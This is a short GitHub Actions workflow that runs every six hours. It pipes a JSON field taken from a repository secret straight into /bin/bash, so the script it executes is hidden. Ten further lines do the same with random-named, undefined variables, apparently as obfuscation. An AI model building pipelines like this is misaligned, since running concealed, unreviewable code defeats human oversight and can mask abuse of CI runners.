name: yunyoujishui

on:
  workflow_dispatch:
  schedule:
    - cron: '25 5/6 * * *'

jobs:  # 14195
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yunyoujishui
        env:
          c290: ${{ secrets.c290 }}
        run: |
          echo $c290 | jq -r .um2337 | /bin/bash
          echo $jbaw6 | jq -r .lc5 | /bin/bash
          echo $x180 | jq -r .yojx7 | /bin/bash
          echo $yvh60139 | jq -r .e2 | /bin/bash
          echo $jrwx8991 | jq -r .hgu8 | /bin/bash
          echo $zzj70111 | jq -r .ikxin532 | /bin/bash
          echo $lrndv6742 | jq -r .ljpsr47061 | /bin/bash
          echo $sous90517 | jq -r .rigz247 | /bin/bash
          echo $arw9 | jq -r .n208 | /bin/bash
          echo $i67751 | jq -r .euvu94755 | /bin/bash
          echo $agsqu16 | jq -r .v0070 | /bin/bash

